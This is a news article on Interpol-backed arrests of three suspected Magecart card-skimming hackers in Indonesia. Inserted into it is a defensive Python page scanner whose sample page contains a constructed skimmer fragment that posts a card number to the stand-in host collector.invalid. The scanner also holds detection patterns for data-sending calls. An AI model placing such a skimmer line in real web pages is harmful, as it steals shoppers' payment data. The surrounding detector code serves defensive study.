Indonesia: Magecart hackers arrested


Police Bust 3 Suspected Magecart Hackers in Indonesia

Operation 'Night Fury' Targets JavaScript Skimming Gangs Hitting E-Commerce Sites

Mathew J. Schwartz
January 27, 2020

Police in Indonesia have arrested three suspected members of an e-commerce hacking crew that employed JavaScript attack code to steal customer and payment card data. The gang allegedly injected malicious JavaScript "skimming" code known as "GetBilling" into targeted websites, in what is often more broadly referred to as Magecart-type attacks.

The suspects were arrested as part of Operation Night Fury, an ongoing anti-skimming probe spearheaded by Interpol's Cyber Capability Desk, backed by U.S. and European law enforcement agencies, which has also involved Indonesia's "Bareskrim Polri" cyber police team. Interpol says another five Association of Southeast Asian Nations member countries have received attack intelligence and are continuing to pursue Night Fury investigations.

Police have only released the three Indonesian suspects' initials and ages - "ANF," 27; "K," 35; "N," 23 - and said they were arrested in two regions in the country: Yogyakarta and Jakarta. Police said they also seized PCs and laptops, mobile phones, ATM cards, identification cards, and BCA - for Bank Central Asia - security tokens.

All three of the men have been charged with violating article 363 of the Indonesian Criminal Code by stealing electronic data; they face a maximum prison sentence of 10 years.

"The suspects have managed to infect hundreds of e-commerce websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil and some other countries," says Singapore-based cybersecurity firm Group-IB, which assisted with the investigation. "Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen."

Investigators have accused the suspects of using stolen payment card data "to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price," Group-IB says.

While investigators have identified nearly 200 websites that the group hacked, Group-IB says that figure seems set to rise as the other five ASEAN countries continue their investigations.

Magecart Attacks Continue
Crime groups surreptitiously inject rogue JavaScript code onto e-commerce sites to intercept payment card and customer data, in what are often known as Magecart attacks. Magecart isn't a stand-alone crime group, but rather an umbrella term that refers to the use of malicious JavaScript sniffing code, aka JS sniffers or virtual skimming code (see: Magecart Group Continues Targeting E-Commerce Sites).

Security firms are tracking at least 12 different Magecart criminal groups, and they say such attacks date from 2014. But since 2018, the quantity of Magecart attacks has surged. Victims of Magecart-associated groups have included shoe manufacturer Fila and bedding sites, as well as British Airways, Ticketmaster and Newegg.

In a 2019 report, Group-IB said it counted 38 JS-sniffer families, but the company said this week that the figure has nearly doubled since then.

More Suspects at Large
The suspects were arrested on Dec. 20, 2019.

One suspect subsequently admitted in an interview on Indonesian television that he'd been intercepting card payments since 2017. But he claimed to have made almost no revenue, earning only enough to "buy a jacket," Amsterdam-based e-commerce security firm Sanguine Security says in a blog post.

The arrests do not appear to have fully disrupted the gang's activities, Sanguine Security says, noting it continued to see attack activity using the same infrastructure afterwards, until as recently as Jan. 15.

"One or more suspects [are] still at large," tweets Dutch security researcher Willem de Groot, a digital forensics specialist at Sanguine Security. "Several card collection servers - such as - have been active and were modified since the arrests" on Dec. 20, 2019.

Overall, Sanguine Security says it has tied 571 different hack attacks to the same individuals. "These hacks could be attributed because of an odd message that was left in all of the skimming code: 'Success gan!'" The firm says that phrase "translates to 'success bro' in Indonesian and has been present for years on all of their skimming infrastructure."
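The two points above, that these attacks work by injecting rogue JavaScript into checkout pages and that a fixed string ("Success gan!") left in the skimming code was enough to tie hundreds of incidents together, translate directly into a defender's page-integrity check. The script below is an added example written for this article, not code from Sanguine Security, Group-IB or the article itself. It parses a checkout page's HTML, lists every script tag, and flags a script when it is loaded from a host outside an allowlist, when it carries a known marker string, or when it both references payment form fields and sends data to a host outside the allowlist. The allowlist hosts, the field-name and send-call heuristics, and the sample page (including its skimmer-like fragment) are all constructed assumptions for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical: hosts approved to serve script on this shop's checkout page.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

# Strings known to appear in a group's skimming code; the article names "Success gan!".
KNOWN_MARKERS = ("Success gan!",)

# Heuristics (assumed for this example): names of payment form fields, and
# browser calls that move data off the page, plus absolute URLs inside script text.
PAYMENT_FIELD_RE = re.compile(r"card ?number|cvv|cvc|expir", re.IGNORECASE)
SEND_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?")

# Constructed sample checkout page: two approved scripts, one unapproved external
# script, a harmless inline validator, and a skimmer-like inline fragment.
SAMPLE_HTML = """
<html><body>
<form id="pay"><input id="cardnumber"><input id="cvv"></form>
<script src="https://cdn.example/app.js"></script>
<script src="/js/local.js"></script>
<script src="https://static.unknown-host.invalid/x.js"></script>
<script>
  // first-party validation: touches the card field but sends nothing anywhere
  document.getElementById('cardnumber').addEventListener('input', function (e) {
    e.target.value = e.target.value.trim();
  });
</script>
<script>
  // constructed skimmer-like fragment: reads the card field, posts it off-site, carries the marker
  var c = document.getElementById('cardnumber').value;
  fetch('https://collector.invalid/c', {method: 'POST', body: c}); // Success gan!
</script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect every <script> on a page as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:  # inside a <script> element
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def external_hosts(body):
    """Hostnames of every absolute URL mentioned in a script body."""
    return {urlparse(u).hostname for u in URL_RE.findall(body)}


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, markers=KNOWN_MARKERS):
    """Return a list of findings, one per suspicious script, each with its reasons."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, (src, body) in enumerate(parser.scripts):
        reasons = []
        if src:
            # Relative src (hostname None) is first-party; absolute src must be allowlisted.
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                reasons.append(f"unapproved script host: {host}")
        else:
            for marker in markers:
                if marker in body:
                    reasons.append(f"known skimmer marker: {marker!r}")
            unapproved = {h for h in external_hosts(body) if h and h not in allowed_hosts}
            if PAYMENT_FIELD_RE.search(body) and SEND_RE.search(body) and unapproved:
                reasons.append("payment fields sent to unapproved host(s): "
                               + ", ".join(sorted(unapproved)))
        if reasons:
            findings.append({"index": idx, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(f"script #{finding['index']} src={finding['src']}: " + "; ".join(finding["reasons"]))
```

Run against a copy of the live page at regular intervals and diff the findings against the previous run: a new external host, or an inline script that suddenly both reads the card fields and calls out, is the condition the article's victims would have wanted to alert on. The marker check is the cheapest of the three and the least durable, since a group can drop its signature string at any time; the allowlist comparison is the one to keep.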

The security firm says attack domains that it has traced to this crime group have included: - or "delicious" - referring to a cafeteria on the island of Borneo

Sanguine Security says at least 17 websites remain infected with the group's attack code.

Indonesian Attack Infrastructure
Group-IB says that some of the attackers' infrastructure was located in Indonesia, although the crime gang tried to hide that fact.

"To access their servers for stolen data collection and their JS-sniffers' control, they always used a VPN to hide their real location and identity," Group-IB says. "To pay for hosting services and buy new domains the gang members only used stolen cards. Despite that, Indonesian cyber police in cooperation with Interpol and Group-IB's cyber investigations team managed to establish that the group was operating from Indonesia....